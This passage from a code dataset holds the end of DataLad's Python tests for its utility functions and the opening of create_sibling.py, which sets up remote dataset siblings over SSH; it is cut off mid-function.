list(right)\n\n eq_(fn([False, True, False]),\n ([False, False], [True]))\n\n eq_(fn([1, 5, 4, 10], lambda x: x > 4),\n ([1, 4], [5, 10]))\n\n eq_(fn([1, 5, 4, 10], lambda x: x < 0),\n ([1, 5, 4, 10], []))\n\n\ndef test_path_():\n eq_(_path_('a'), 'a')\n if on_windows:\n eq_(_path_('a/b'), r'a\\b')\n else:\n p = 'a/b/c'\n assert(_path_(p) is p) # nothing is done to it whatsoever\n eq_(_path_(p, 'd'), 'a/b/c/d')\n\n\ndef test_get_timestamp_suffix():\n # we need to patch temporarily TZ\n with patch.dict('os.environ', {'TZ': 'GMT'}):\n # figure out how GMT time zone suffix is represented\n # could be +0 or -0, depending on platform\n # just use whatever it is, not the subject of this test\n tz_suffix = time.strftime('%z', time.gmtime(0))\n # skynet DOB\n target_ts = '1970-01-01T00:00:00' + tz_suffix\n assert_equal(get_timestamp_suffix(0), '-' + target_ts)\n assert_equal(get_timestamp_suffix(0, prefix=\"+\"),\n '+' + target_ts)\n # yoh found no way to mock things out and didn't want to provide\n # explicit call to anything to get current time with the timezone,\n # so disabling this test for now besides that it should return smth\n # sensible ;)\n #with patch.object(time, 'localtime', lambda: 1):\n # 
assert_equal(get_timestamp_suffix(),\n # '-1970-01-01T00:00:01+0000') # skynet is 1 sec old\n assert(get_timestamp_suffix().startswith('-'))\n\n\ndef test_memoized_generator():\n called = [0]\n\n def g1(n):\n \"\"\"a generator\"\"\"\n called[0] += 1\n for i in range(n):\n yield i\n\n from ..utils import saved_generator\n ok_generator(g1(3))\n g1_, g2_ = saved_generator(g1(3))\n ok_generator(g1_)\n ok_generator(g2_)\n target = list(g1(3))\n eq_(called[0], 1)\n eq_(target, list(g1_))\n eq_(called[0], 2)\n eq_(target, list(g2_))\n eq_(called[0], 2) # no new call to make a generator\n # but we can't (ab)use 2nd time\n eq_([], list(g2_))\n\n\ndef test_assure_unicode():\n ok_(isinstance(ensure_unicode(\"m\"), str))\n ok_(isinstance(ensure_unicode('grandchild_äöü東'), str))\n ok_(isinstance(ensure_unicode(u'grandchild_äöü東'), str))\n eq_(ensure_unicode('grandchild_äöü東'), u'grandchild_äöü東')\n # now, non-utf8\n # Decoding could be deduced with high confidence when the string is\n # really encoded in that codepage\n mom_koi8r = u\"мама\".encode('koi8-r')\n eq_(ensure_unicode(mom_koi8r), u\"мама\")\n eq_(ensure_unicode(mom_koi8r, confidence=0.9), u\"мама\")\n mom_iso8859 = u'mamá'.encode('iso-8859-1')\n eq_(ensure_unicode(mom_iso8859), u'mamá')\n eq_(ensure_unicode(mom_iso8859, confidence=0.5), u'mamá')\n # but when we mix, it does still guess something allowing to decode:\n mixedin = mom_koi8r + u'東'.encode('iso2022_jp') + u'東'.encode('utf-8')\n ok_(isinstance(ensure_unicode(mixedin), str))\n # but should fail if we request high confidence result:\n with assert_raises(ValueError):\n ensure_unicode(mixedin, confidence=0.9)\n # For other, non string values, actually just returns original value\n # TODO: RF to actually \"assure\" or fail?? For now hardcoding that assumption\n assert ensure_unicode(1) == 1\n\n\ndef test_pathlib_unicode():\n eq_(str(Path(\"a\")), u\"a\")\n eq_(str(Path(u\"β\")), u\"β\")\n\n\n@with_tempfile(mkdir=True)\ndef test_path_prefix(path=None):\n eq_(get_path_prefix(_p('/d1/d2'), _p('/d1/d2')), _p(''))\n # so we are under /d1/d2 so path prefix is ..\n eq_(get_path_prefix(_p('/d1/d2'), _p('/d1/d2/d3')), _p('..'))\n eq_(get_path_prefix(_p('/d1/d2/d3'), _p('/d1/d2')), _p('d3'))\n # but if outside -- full path\n eq_(get_path_prefix(_p('/d1/d2'), _p('/d1/d20/d3')), _p('/d1/d2'))\n with chpwd(path):\n eq_(get_path_prefix('.'), '')\n eq_(get_path_prefix('d1'), 'd1')\n eq_(get_path_prefix('d1', 'd2'), opj(path, 'd1'))\n eq_(get_path_prefix('..'), '..')\n\n\ndef test_get_trace():\n assert_raises(ValueError, get_trace, [], 'boom', 'does_not_matter')\n eq_(get_trace([('A', 'B')], 'A', 'A'), None)\n eq_(get_trace([('A', 'B')], 'A', 'B'), [])\n eq_(get_trace([('A', 'B')], 'A', 'C'), None)\n eq_(get_trace([('A', 'B'),\n ('B', 'C')], 'A', 'C'), ['B'])\n # order of edges doesn't matter\n eq_(get_trace([\n ('B', 'C'),\n ('A', 'B')\n ], 'A', 'C'), ['B'])\n # mixed rubbish\n eq_(get_trace([\n (1, 3),\n ('B', 'C'),\n (None, ('schwak', 7)),\n ('A', 'B'),\n ], 'A', 'C'), ['B'])\n # long\n eq_(get_trace([\n ('B', 'C'),\n ('A', 'B'),\n ('distract', 'me'),\n ('C', 'D'),\n ('D', 'E'),\n ], 'A', 'E'), ['B', 'C', 'D'])\n\n\n@with_tempfile(mkdir=True)\ndef test_get_dataset_root(path=None):\n eq_(get_dataset_root('/nonexistent'), None)\n with chpwd(path):\n repo = AnnexRepo(os.curdir, create=True)\n subdir = opj('some', 'deep')\n fname = opj(subdir, 'dummy')\n os.makedirs(subdir)\n with open(fname, 'w') as f:\n f.write('some')\n repo.add(fname)\n # we can find this repo\n eq_(get_dataset_root(os.curdir), 
os.curdir)\n # and we get the type of path that we fed in\n eq_(get_dataset_root(abspath(os.curdir)), abspath(os.curdir))\n # subdirs are no issue\n eq_(get_dataset_root(subdir), os.curdir)\n # even more subdirs are no issue\n eq_(get_dataset_root(opj(subdir, subdir)), os.curdir)\n # non-dir paths are no issue\n eq_(get_dataset_root(fname), os.curdir)\n\n\ndef _p(p: str) -> str:\n \"\"\"A helper to code paths as POSIX paths in tests below. Would prepend fake drive\n C: to absolute paths on Windows\"\"\"\n if on_windows:\n pm = p.replace('/', os.sep)\n if p.startswith('/'):\n return f\"C:{pm}\"\n else:\n return pm\n return p\n\n\ndef test_path_startswith():\n ok_(path_startswith(_p('/a/b'), _p('/a')))\n ok_(path_startswith(_p('/a/b'), _p('/a/b')))\n ok_(path_startswith(_p('/a/b'), _p('/a/b/')))\n ok_(path_startswith(_p('/a/b/'), _p('/a/b')))\n ok_(path_startswith(_p('/a/b'), _p('/')))\n ok_(path_startswith(_p('/aaa/b/c'), _p('/aaa')))\n nok_(path_startswith(_p('/aaa/b/c'), _p('/aa')))\n nok_(path_startswith(_p('/a/b'), _p('/a/c')))\n nok_(path_startswith(_p('/a/b/c'), _p('/a/c')))\n # must not mix relative and abs\n assert_raises(ValueError, path_startswith, _p('a/b'), _p('/a'))\n assert_raises(ValueError, path_startswith, _p('/a/b'), _p('a'))\n\n\ndef test_path_is_subpath():\n ok_(path_is_subpath(_p('/a/b'), _p('/a')))\n ok_(path_is_subpath(_p('/a/b/c'), _p('/a')))\n nok_(path_is_subpath(_p('/a/b'), _p('/a/b')))\n nok_(path_is_subpath(_p('/a/b'), _p('/a/b/')))\n nok_(path_is_subpath(_p('/a/b/'), _p('/a/b')))\n ok_(path_is_subpath(_p('/a/b'), _p('/')))\n ok_(path_is_subpath(_p('/aaa/b/c'), _p('/aaa')))\n nok_(path_is_subpath(_p('/aaa/b/c'), _p('/aa')))\n nok_(path_is_subpath(_p('/a/b'), _p('/a/c')))\n nok_(path_is_subpath(_p('/a/b/c'), _p('/a/c')))\n # must not mix relative and abs\n assert_raises(ValueError, path_is_subpath, _p('a/b'), _p('/a'))\n assert_raises(ValueError, path_is_subpath, _p('/a/b'), _p('a'))\n\n\ndef test_probe_known_failure():\n\n # Note: we can't test the switch \"datalad.tests.knownfailures.probe\"\n # directly, since it was evaluated in the decorator already. 
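# A small sketch contrasting the two path predicates exercised above:
# path_startswith() accepts the path itself, while path_is_subpath()
# requires a proper subpath. Assumes datalad is importable and a POSIX-style
# filesystem; the concrete paths are arbitrary.
from datalad.utils import path_is_subpath, path_startswith

assert path_startswith('/data/ds/file.dat', '/data/ds')
assert path_startswith('/data/ds', '/data/ds')          # equality counts
assert path_is_subpath('/data/ds/file.dat', '/data/ds')
assert not path_is_subpath('/data/ds', '/data/ds')      # equality does not
# both helpers refuse to mix relative and absolute paths (ValueError)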
So we need\n # to have different assertions in this test based on config and have it\n # tested across builds, which use different settings for that switch.\n\n @probe_known_failure\n def not_failing():\n pass\n\n @probe_known_failure\n def failing():\n raise AssertionError(\"Failed\")\n\n switch = dl_cfg.obtain(\"datalad.tests.knownfailures.probe\")\n\n if switch:\n # if probing is enabled the failing is considered to be expected and\n # therefore the decorated function doesn't actually fail:\n failing()\n # in opposition a function that doesn't fail raises an AssertionError:\n assert_raises(AssertionError, not_failing)\n else:\n # if probing is disabled it should just fail/pass as is:\n assert_raises(AssertionError, failing)\n not_failing()\n\n\ndef test_skip_if():\n\n def dummy():\n raise AssertionError\n\n assert_raises(AssertionError, dummy)\n # if cond is False, call the decorated function:\n assert_raises(AssertionError, skip_if(cond=False, method='raise')(dummy))\n # raises SkipTest if cond is True\n assert_raises(SkipTest, skip_if(cond=True, method='raise')(dummy))\n # but with method 'pass', there is neither SkipTest nor AssertionError.\n # Instead the function call is just skipped:\n skip_if(cond=True, method='pass')(dummy)\n # But if condition is False, the original function is still called:\n assert_raises(AssertionError, skip_if(cond=False, method='pass')(dummy))\n\n\ndef test_skip_known_failure():\n\n # Note: we can't test the switch \"datalad.tests.knownfailures.skip\"\n # directly, since it was evaluated in the decorator already. So we need\n # to have different assertions in this test based on config and have it\n # tested across builds, which use different settings for that switch.\n\n @skip_known_failure\n def failing():\n raise AssertionError(\"Failed\")\n\n switch = dl_cfg.obtain(\"datalad.tests.knownfailures.skip\")\n\n if switch:\n # if skipping is enabled, we shouldn't see the exception:\n failing()\n else:\n # if it's disabled, failing() is executed and therefore exception\n # is raised:\n assert_raises(AssertionError, failing)\n\n\ndef test_known_failure():\n\n @known_failure\n def failing():\n raise AssertionError(\"Failed\")\n\n skip = dl_cfg.obtain(\"datalad.tests.knownfailures.skip\")\n probe = dl_cfg.obtain(\"datalad.tests.knownfailures.probe\")\n\n if skip:\n # skipping takes precedence over probing\n failing()\n elif probe:\n # if we probe a known failure it's okay to fail:\n failing()\n else:\n # not skipping and not probing results in the original failure:\n assert_raises(AssertionError, failing)\n\n\nfrom datalad.utils import read_csv_lines\n\n\ndef test_known_failure_direct_mode():\n # Decorator is deprecated now and that is what we check\n from .utils_pytest import known_failure_direct_mode\n\n x = []\n with swallow_logs(new_level=logging.WARNING) as cml:\n @known_failure_direct_mode\n def failing():\n x.append('ok')\n raise AssertionError(\"Failed\")\n\n assert_raises(AssertionError, failing) # nothing is swallowed\n eq_(x, ['ok']) # everything runs\n assert_in(\"Direct mode support is deprecated\", cml.out)\n\n\n@with_tempfile(content=\"h1 h2\\nv1 2\\nv2 3\")\ndef test_read_csv_lines_basic(infile=None):\n # Just a basic test, next one with unicode\n gen = read_csv_lines(infile)\n ok_generator(gen)\n eq_(\n list(gen),\n [\n {u'h1': u'v1', u'h2': u'2'},\n {u'h1': u'v2', u'h2': u'3'},\n ]\n )\n\n\n@with_tempfile(content=u\"h1\\th2\\nv1\\tдата\".encode('utf-8'))\ndef test_read_csv_lines_tsv_unicode(infile=None):\n # Just a basic test, next one with 
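# A hedged usage sketch for read_csv_lines() as exercised above: it yields
# one dict per data row, keyed by the header line, and handles both
# whitespace- and tab-separated files. Assumes datalad is importable; the
# temporary file and its content are made up.
import os
import tempfile

from datalad.utils import read_csv_lines

fd, fname = tempfile.mkstemp()
with os.fdopen(fd, 'w') as f:
    f.write("subject age\nsub-01 23\nsub-02 31")

rows = list(read_csv_lines(fname))
assert rows == [
    {'subject': 'sub-01', 'age': '23'},
    {'subject': 'sub-02', 'age': '31'},
]
os.unlink(fname)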
unicode\n gen = read_csv_lines(infile)\n ok_generator(gen)\n eq_(\n list(gen),\n [\n {u'h1': u'v1', u'h2': u'дата'},\n ]\n )\n\n\n@with_tempfile(content=u\"h1\\nv1\\nv2\")\ndef test_read_csv_lines_one_column(infile=None):\n # Just a basic test, next one with unicode\n eq_(\n list(read_csv_lines(infile)),\n [\n {u'h1': u'v1'},\n {u'h1': u'v2'},\n ]\n )\n\n\ndef _get_testm_tree(ind):\n \"\"\"Generate a fake package with submodules\n\n We need to increment index for different tests since otherwise e.g.\n import_modules fails to import submodule if first import_module_from_file\n imports that one\n \"\"\"\n return {\n 'dltestm%d' % ind: {\n '__init__.py': '',\n 'dlsub1': {'__init__.py': 'var = 1'},\n 'dlsub2.py': 'var = 2'}\n }\n\n@with_tree(tree=_get_testm_tree(1))\ndef test_import_modules(topdir=None):\n try:\n sys.path.append(topdir)\n mods = import_modules(['dlsub1', 'bogus'], 'dltestm1')\n finally:\n sys.path.pop(sys.path.index(topdir))\n eq_(len(mods), 1)\n eq_(mods[0].__name__, 'dltestm1.dlsub1')\n\n\n@with_tree(tree=_get_testm_tree(2))\ndef test_import_module_from_file(topdir=None):\n with assert_raises(AssertionError):\n # we support only submodule files ending with .py ATM. TODO\n import_module_from_file(op.join(topdir, 'dltestm2', 'dlsub1'))\n\n dlsub2_path = op.join(topdir, 'dltestm2', 'dlsub2.py')\n mod = import_module_from_file(dlsub2_path)\n eq_(mod.__name__, 'dlsub2') # we are not asking to import as submod of the dltestm1\n assert_in('dlsub2', sys.modules)\n\n try:\n sys.path.append(topdir)\n import dltestm2\n mod = import_module_from_file(dlsub2_path, pkg=dltestm2)\n eq_(mod.__name__, 'dltestm2.dlsub2')\n assert_in('dltestm2.dlsub2', sys.modules)\n finally:\n sys.path.pop(sys.path.index(topdir))\n\n\ndef test_import_modules_fail():\n # test that we log failures correctly\n failures = []\n import_modules(['bogus'], 'datalad', 'Fail {package}.{module}', failures.append)\n eq_(len(failures), 1)\n ok_startswith(failures[0], \"Fail datalad.bogus: No module\")\n\n\n# Should be the last one since as discovered in NICEMAN might screw up coverage\ndef test_line_profile():\n skip_if_no_module('line_profiler')\n\n @line_profile\n def f(j):\n i = j + 1 # xyz\n return i\n\n with swallow_outputs() as cmo:\n assert_equal(f(3), 4)\n assert_equal(cmo.err, '')\n assert_in('i = j + 1 # xyz', cmo.out)\n\n\n@with_tempfile(mkdir=True)\ndef test_dlabspath(path=None):\n if not has_symlink_capability():\n raise SkipTest\n # initially ran into on OSX https://github.com/datalad/datalad/issues/2406\n opath = opj(path, \"origin\")\n os.makedirs(opath)\n lpath = opj(path, \"linked\")\n os.symlink('origin', lpath)\n for d in opath, lpath:\n # regardless under which directory, all results should not resolve\n # anything\n eq_(d, dlabspath(d))\n # in the root of ds\n with chpwd(d):\n eq_(dlabspath(\"path\"), opj(d, \"path\"))\n eq_(dlabspath(\"./path\"), opj(d, \"./path\")) # we do not normpath by default\n eq_(dlabspath(\"./path\", norm=True), opj(d, \"path\"))\n\n\n@with_tree({'1': 'content', 'd': {'2': 'more'}})\ndef test_get_open_files(p=None):\n pobj = Path(p)\n skip_if_no_module('psutil')\n eq_(get_open_files(p), {})\n f1 = pobj / '1'\n subd = pobj / 'd'\n with f1.open() as f:\n # since lsof does not care about PWD env var etc, paths\n # will not contain symlinks, we better realpath them\n # all before comparison\n eq_(get_open_files(p, log_open=40)[str(f1.resolve())].pid,\n os.getpid())\n\n assert not get_open_files(str(subd))\n\n if on_windows:\n # the remainder of the test assume a certain 
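# A hedged sketch of the dynamic-import helpers exercised above:
# import_modules() imports the named submodules of a package and reports
# failures through an optional callback instead of raising. Assumes
# datalad is importable; 'no_such_submodule' is intentionally bogus.
from datalad.utils import import_modules

failures = []
mods = import_modules(
    ['cmd', 'no_such_submodule'], 'datalad',
    'Could not import {package}.{module}', failures.append)
assert any(m.__name__ == 'datalad.cmd' for m in mods)
assert len(failures) == 1 and failures[0].startswith('Could not import')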
performance.\n # however, on windows get_open_files() can be very slow\n # (e.g. the first invocation in this test (above) can easily\n # take 30-50s). It is not worth slowing the tests to\n # accommodate this issue, given we have tested proper functioning\n # in principle already above).\n return\n\n # if we start a process within that directory, should get informed\n from subprocess import (\n PIPE,\n Popen,\n )\n from time import time\n t0 = time()\n proc = Popen([sys.executable, '-c',\n r'import sys; sys.stdout.write(\"OK\\n\"); sys.stdout.flush();'\n r'import time; time.sleep(10)'],\n stdout=PIPE,\n cwd=str(subd))\n # Assure that it started and we read the OK\n eq_(ensure_unicode(proc.stdout.readline().strip()), u\"OK\")\n assert time() - t0 < 5 # that we were not stuck waiting for process to finish\n eq_(get_open_files(p)[str(subd.resolve())].pid, proc.pid)\n eq_(get_open_files(subd)[str(subd.resolve())].pid, proc.pid)\n proc.terminate()\n assert_equal(get_open_files(str(subd)), {})\n\n\ndef test_map_items():\n def add10(x):\n return x + 10\n eq_(map_items(add10, {2: 3}), {12: 13})\n\n class Custom(object):\n \"\"\"For testing with custom items possibly of varying length etc\"\"\"\n def __init__(self, items):\n self._items = list(items)\n\n def items(self):\n return self._items\n\n c = Custom([(1,), (2, 3), (4, 5, 6)])\n c_mapped = map_items(add10, c)\n assert type(c) is type(c_mapped)\n eq_(c_mapped.items(), [(11,), (12, 13), (14, 15, 16)])\n\n\ndef test_CMD_MAX_ARG():\n # 100 is arbitrarily large small integer ;)\n # if fails -- we are unlikely to be able to work on this system\n # and something went really wrong!\n assert_greater(CMD_MAX_ARG, 100)\n\n\n@with_tempfile(mkdir=True)\ndef test_create_tree(path=None):\n content = u\"мама мыла раму\"\n create_tree(path, dict([\n ('1', content),\n ('sd', dict(\n [\n # right away an obscure case where we have both 1 and 1.gz\n ('1', content*2),\n ('1.gz', content*3),\n ('1.xz', content*4),\n ('1.lzma', content*5),\n ]\n )),\n ]))\n ok_file_has_content(op.join(path, '1'), content)\n ok_file_has_content(op.join(path, 'sd', '1'), content*2)\n ok_file_has_content(op.join(path, 'sd', '1.gz'), content*3, decompress=True)\n ok_file_has_content(op.join(path, 'sd', '1.xz'), content*4, decompress=True)\n ok_file_has_content(op.join(path, 'sd', '1.lzma'), content*5, decompress=True)\n\n\ndef test_never_fail():\n\n @never_fail\n def iamok(arg):\n return arg\n eq_(iamok(1), 1)\n\n @never_fail\n def ifail(arg):\n raise ValueError\n eq_(ifail(1), None)\n\n with patch.dict('os.environ', {'DATALAD_ALLOW_FAIL': '1'}):\n # decision to create failing or not failing function\n # is done at the time of decoration\n @never_fail\n def ifail2(arg):\n raise ValueError\n\n assert_raises(ValueError, ifail2, 1)\n\n\[email protected](reason=\"TODO: for some reason fails on Travis\")\n@with_tempfile\ndef test_is_interactive(fout=None):\n # must not fail if one of the streams is no longer open:\n # https://github.com/datalad/datalad/issues/3267\n from datalad.cmd import (\n KillOutput,\n NoCapture,\n StdOutErrCapture,\n WitlessRunner,\n )\n from datalad.support.annexrepo import (\n AnnexInitOutput,\n AnnexJsonProtocol,\n )\n from datalad.support.gitrepo import GitProgress\n\n bools = [\"False\", \"True\"]\n\n def get_interactive(py_pre=\"\", **run_kwargs):\n out = WitlessRunner().run(\n [sys.executable,\n \"-c\",\n py_pre +\n 'from datalad.utils import is_interactive; '\n 'f = open(%r, \"w\"); '\n 'f.write(str(is_interactive())); '\n 'f.close()'\n % fout\n ],\n 
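# A brief sketch of map_items() as exercised above: the callable is applied
# to both keys and values, and the result is rebuilt as the same mapping
# class that was passed in. Assumes datalad is importable.
from collections import OrderedDict

from datalad.utils import map_items

mapped = map_items(str, OrderedDict([(1, 2), (3, 4)]))
assert isinstance(mapped, OrderedDict)
assert mapped == OrderedDict([('1', '2'), ('3', '4')])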
**run_kwargs\n )\n with open(fout) as f:\n out = f.read()\n assert_in(out, bools)\n return bool(bools.index(out))\n\n # verify that NoCapture can make fully interactive execution\n # happen, also test the core protocols\n # (we can only be interactive in a runner, if the test execution\n # itself happens in an interactive environment)\n for proto, interactive in ((NoCapture,\n # It is unclear why (on travis only) a child\n # process can report to be interactive\n # whenever the parent process is not.\n # Maintain this test exception until\n # someone can provide insight. The point of\n # this test is to ensure that NoCapture\n # in an interactive parent also keeps the\n # child interactive, so this oddity is not\n # relevant.\n True if on_travis else is_interactive()),\n (KillOutput, False),\n (StdOutErrCapture, False),\n (GitProgress, False),\n (AnnexInitOutput, False),\n (AnnexJsonProtocol, False)):\n eq_(get_interactive(protocol=proto),\n interactive,\n msg='{} -> {}'.format(str(proto), interactive))\n # and it must not crash if smth is closed\n for o in ('stderr', 'stdin', 'stdout'):\n eq_(get_interactive(\"import sys; sys.%s.close(); \" % o), False)\n\n\ndef test_splitjoin_cmdline():\n # Do full round trip on a number of tricky samples\n for args in (\n ['cmd', '-o1', 'simple'],\n ['c o', r'\\m', ''],\n ['c o', ' '],\n ):\n cmdline = join_cmdline(args)\n assert isinstance(cmdline, str)\n eq_(split_cmdline(cmdline), args)\n # assure that there is no needless quoting\n if on_windows:\n # in quote_cmdlinearg we always quote on Windows\n eq_(join_cmdline(['abc', 'def']), '\"abc\" \"def\"')\n else:\n eq_(join_cmdline(['abc', 'def']), 'abc def')\n\n\n@skip_if_root\n@with_tempfile\ndef test_obtain_write_permission(path=None):\n path = Path(path)\n\n # there's nothing at path yet:\n assert_raises(FileNotFoundError, obtain_write_permission, path)\n\n # Revoke write permission\n path.write_text(\"something\")\n path.chmod(path.stat().st_mode & ~stat.S_IWRITE)\n assert_raises(PermissionError, path.write_text, \"different thing\")\n\n # Obtain and try again:\n obtain_write_permission(path)\n path.write_text(\"different thing\")\n\n # Already having permission is no issue:\n obtain_write_permission(path)\n path.write_text(\"yet another thing\")\n\n\n@skip_if_root\n@with_tempfile(mkdir=True)\ndef test_ensure_write_permission(path=None):\n\n # This is testing the usecase of write protected directories needed for\n # messing with an annex object tree (as done by the ORA special remote).\n # However, that doesn't work on Windows since we can't revoke write\n # permissions for the owner of a directory (at least on VFAT - may be\n # true for NTFS as well - don't know).\n # Hence, on windows/crippledFS only test on a file.\n\n dir_ = Path(path)\n if not on_windows and has_symlink_capability:\n # set up write-protected dir containing a file\n file_ = dir_ / \"somefile\"\n file_.write_text(\"whatever\")\n dir_.chmod(dir_.stat().st_mode & ~stat.S_IWRITE)\n assert_raises(PermissionError, file_.unlink)\n\n # contextmanager lets us do it and restores permissions afterwards:\n mode_before = dir_.stat().st_mode\n with ensure_write_permission(dir_):\n file_.unlink()\n\n mode_after = dir_.stat().st_mode\n assert_equal(mode_before, mode_after)\n assert_raises(PermissionError, file_.write_text, \"new file can't be \"\n \"written\")\n\n assert_raises(FileNotFoundError, ensure_write_permission(dir_ /\n \"non\" / \"existent\").__enter__)\n\n # deletion within context doesn't let mode restoration fail:\n with 
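# A hedged round-trip sketch for the command-line helpers exercised above:
# join_cmdline() quotes each argument as needed for the current platform and
# split_cmdline() reverses it. Assumes datalad is importable; the argument
# list is arbitrary.
from datalad.utils import join_cmdline, split_cmdline

args = ['git', 'annex', 'copy', '--to', 'my remote', 'file with spaces.txt']
cmdline = join_cmdline(args)
assert isinstance(cmdline, str)
assert split_cmdline(cmdline) == args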
ensure_write_permission(dir_):\n dir_.rmdir()\n\n dir_.mkdir() # recreate, since next block is executed unconditionally\n\n # set up write-protected file:\n file2 = dir_ / \"protected.txt\"\n file2.write_text(\"unchangeable\")\n file2.chmod(file2.stat().st_mode & ~stat.S_IWRITE)\n assert_raises(PermissionError, file2.write_text, \"modification\")\n\n # within context we can:\n with ensure_write_permission(file2):\n file2.write_text(\"modification\")\n\n # mode is restored afterwards:\n assert_raises(PermissionError, file2.write_text, \"modification2\")\n" }, { "alpha_fraction": 0.5496479868888855, "alphanum_fraction": 0.5510939359664917, "avg_line_length": 39.44774627685547, "blob_id": "325162516fc5fa951a97db93825ec395381b37da", "content_id": "7ae1d966c259394f683916ce68b61c761d0ecd70", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42187, "license_type": "permissive", "max_line_length": 95, "num_lines": 1043, "path": "/datalad/distribution/create_sibling.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creation of publication target via SSH\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport os\nfrom os.path import curdir\nimport shlex\nfrom os.path import join as opj\nfrom os.path import (\n normpath,\n relpath,\n)\n\nfrom looseversion import LooseVersion\n\nfrom datalad import ssh_manager\nfrom datalad.cmd import (\n CommandError,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.consts import (\n TIMESTAMP_FMT,\n WEB_META_LOG,\n)\nfrom datalad.core.local.diff import diff_dataset\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.distribution.siblings import (\n Siblings,\n _DelayedSuper,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n annex_group_opt,\n annex_groupwanted_opt,\n annex_wanted_opt,\n as_common_datasrc,\n inherit_opt,\n publish_by_default,\n publish_depends,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n InsufficientArgumentsError,\n MissingExternalDependency,\n)\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.network import (\n RI,\n PathRI,\n is_ssh,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.ui import ui\nfrom datalad.utils import (\n _path_,\n ensure_list,\n make_tempfile,\n on_windows,\n)\nfrom datalad.utils import quote_cmdlinearg as sh_quote\nfrom datalad.utils import slash_join\n\nlgr = logging.getLogger('datalad.distribution.create_sibling')\n# Window's own mkdir command creates intermediate directories by default\n# and does not take flags: https://github.com/datalad/datalad/issues/5211\nmkdir_cmd = \"mkdir\" if on_windows else \"mkdir -p\"\n\n\nclass _RunnerAdapter(WitlessRunner):\n 
\"\"\"An adapter to use interchanegably with SSH connection\"\"\"\n\n def __call__(self, cmd):\n out = self.run(cmd, protocol=StdOutErrCapture)\n return out['stdout'], out['stderr']\n\n def get_git_version(self):\n return external_versions['cmd:git']\n\n def get_annex_version(self):\n return external_versions['cmd:annex']\n\n def put(self, source, destination, recursive=False,\n preserve_attrs=False):\n import shutil\n copy_fn = shutil.copy2 if preserve_attrs else shutil.copy\n if recursive:\n args = [source, destination]\n kwargs = {\"copy_function\": copy_fn}\n try:\n shutil.copytree(*args, **kwargs)\n except FileExistsError:\n # SSHConnection.put() is okay with copying a tree if the\n # destination directory already exists. With Python 3.8, we can\n # make copytree() do the same with dirs_exist_ok=True. But for\n # now, just rely on `cp`.\n cmd = [\"cp\", \"-R\"]\n if preserve_attrs:\n cmd.append(\"-p\")\n self(cmd + args)\n else:\n copy_fn(source, destination)\n\n\ndef _create_dataset_sibling(\n name,\n ds,\n hierarchy_basepath,\n shell,\n replicate_local_structure,\n ri,\n target_dir,\n target_url,\n target_pushurl,\n existing,\n shared,\n group,\n publish_depends,\n publish_by_default,\n install_postupdate_hook,\n as_common_datasrc,\n annex_wanted,\n annex_group,\n annex_groupwanted,\n inherit\n):\n \"\"\"Everyone is very smart here and could figure out the combinatorial\n affluence among provided tiny (just slightly over a dozen) number of options\n and only a few pages of code\n \"\"\"\n localds_path = ds.path\n ds_name = relpath(localds_path, start=hierarchy_basepath)\n if not replicate_local_structure:\n ds_name = '' if ds_name == curdir \\\n else '-{}'.format(ds_name.replace(\"/\", \"-\"))\n remoteds_path = target_dir.replace(\n \"%RELNAME\",\n ds_name)\n else:\n # TODO: opj depends on local platform, not the remote one.\n # check how to deal with it. Does windows ssh server accept\n # posix paths? vice versa? Should planned SSH class provide\n # tools for this issue?\n # see gh-1188\n remoteds_path = normpath(opj(target_dir, ds_name))\n\n ds_repo = ds.repo\n # construct a would-be ssh url based on the current dataset's path\n ri.path = remoteds_path\n ds_url = ri.as_str()\n # configure dataset's git-access urls\n ds_target_url = target_url.replace('%RELNAME', ds_name) \\\n if target_url else ds_url\n # push, configure only if needed\n ds_target_pushurl = None\n if ds_target_url != ds_url:\n # not guaranteed that we can push via the primary URL\n ds_target_pushurl = target_pushurl.replace('%RELNAME', ds_name) \\\n if target_pushurl else ds_url\n\n lgr.info(\"Considering to create a target dataset %s at %s of %s\",\n localds_path, remoteds_path,\n \"localhost\" if isinstance(ri, PathRI) else ri.hostname)\n # Must be set to True only if exists and existing='reconfigure'\n # otherwise we might skip actions if we say existing='reconfigure'\n # but it did not even exist before\n only_reconfigure = False\n if remoteds_path != '.':\n # check if target exists\n # TODO: Is this condition valid for != '.' 
only?\n path_children = _ls_remote_path(shell, remoteds_path)\n path_exists = path_children is not None\n\n if path_exists:\n _msg = \"Target path %s already exists.\" % remoteds_path\n if path_exists and not path_children:\n # path should be an empty directory, which should be ok to remove\n try:\n lgr.debug(\n \"Trying to rmdir %s on remote since seems to be an empty dir\",\n remoteds_path\n )\n # should be safe since should not remove anything unless an empty dir\n shell(\"rmdir {}\".format(sh_quote(remoteds_path)))\n path_exists = False\n except CommandError as e:\n # If fails to rmdir -- either contains stuff no permissions\n # TODO: fixup encode/decode dance again :-/ we should have got\n # unicode/str here by now. I guess it is the same as\n # https://github.com/ReproNim/niceman/issues/83\n # where I have reused this Runner thing\n try:\n # ds_name is unicode which makes _msg unicode so we must be\n # unicode-ready\n err_str = str(e.stderr)\n except UnicodeDecodeError:\n err_str = e.stderr.decode(errors='replace')\n _msg += \" And it fails to rmdir (%s).\" % (err_str.strip(),)\n\n if path_exists:\n if existing == 'error':\n raise RuntimeError(_msg)\n elif existing == 'skip':\n lgr.info(_msg + \" 